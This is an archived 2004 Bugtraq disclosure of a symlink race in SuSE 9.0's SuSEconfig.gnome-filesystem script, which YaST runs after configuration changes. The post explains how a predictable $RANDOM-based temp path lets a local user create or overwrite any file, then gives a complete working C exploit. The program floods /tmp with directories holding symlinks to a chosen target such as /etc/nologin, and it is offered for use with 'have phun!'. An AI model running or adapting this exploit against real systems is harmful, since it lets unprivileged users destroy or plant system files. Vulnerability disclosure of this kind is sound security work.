Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: SuSE linux 9.0 YaST config Skribt [exploit]

SuSE linux 9.0 YaST config Skribt [exploit]

From: Rene <l0om_at_excluded.org>
Date: 13 Jan 2004 20:28:15 -0000
('binary' encoding is not supported, stored as-is)  Author: l0om <l0om_at_excluded.org>
 Date: 12.01.2004
 page: www.excluded.org
 
 SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
  
 There is a symlink problem in the
SuSEconfig.gnome-filesystem
 scribt. a normal user can creat and overwrite every
file
 on the system. This script gets executed after a
configuration change by the
setup tool YaST. So if you have installed gnome or
parts of gnome check this out.
  
  
 When this scribt gets executed by YaST after a
 configuration change it does the following:
  
 TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
 mkdir $TEMP
 touch $TEMP/list
 [...]
 echo >$TEMP/found
 [...]
  
 the env variable $RANDOM includes a random number.
in my tests
 this number goes up from 1 to 33000. But also if it
goes up to
 65535 it is still vul. to a symlink attack. this is
nearly as
 bad as the symlink problem which has been found on
SuSE 8.2.
 On 8.2 a SuSEconf scribt has created a link with the
$$ at the
 file end.
  
 I have used a little exploit written in C which
creats the
 directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1"
up to
 33000. in every directory i have created a symlink
to a file
 which i want to creat or to overwrite. as the
filename i have
 taken the $TEMP/found and let it point to some file.
in my test i
 have taken the /etc/nologin- and hey- it has worked!
  
 have phun!
  
  
*******************************************************************/
  
 #include <stdio.h>
 #include <unistd.h>
 #include <string.h>
  
 #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
 #define START 1
 #define END 33000
  
 int main(int argc, char **argv)
 {
 int i;
 char buf[150];
  
 printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
 printf("\t-------------------------------------------------------------
\n");
 printf("\tdiscovered and written by l0om
<l0om_at_excluded.org>\n");
 printf("\t WWW.EXCLUDED.ORG\n\n");
  
 if(argc != 2) {
 printf("usage: %s <destination-file>\n",argv[0]);
 exit(0xff);
 }
  
 printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
 read(1, buf, 1); fflush(stdin);
  
 umask(0000);
 printf("working\n\n");
 for(i = START; i < END; i++) {
 snprintf(buf, sizeof(buf),"%s%d",PATH,i);
 if(mkdir(buf,00777) == -1) {
 fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
 exit(0xff);
 }
 if(!(i%1000))printf(".");
 strcat(buf, "/found");
 if(symlink(argv[1], buf) == -1) {
 fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
 exit(0xff);
 }
 }
 printf("\ndone!\n");
 printf("next time the SuSE.gnome-filesystem script
gets executed\n");
 printf("we will create or overwrite file %s
\n",argv[1]);
 return(0x00);
 } /* i cant wait for the new gobbles comic!! */
Received on Jan 13 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos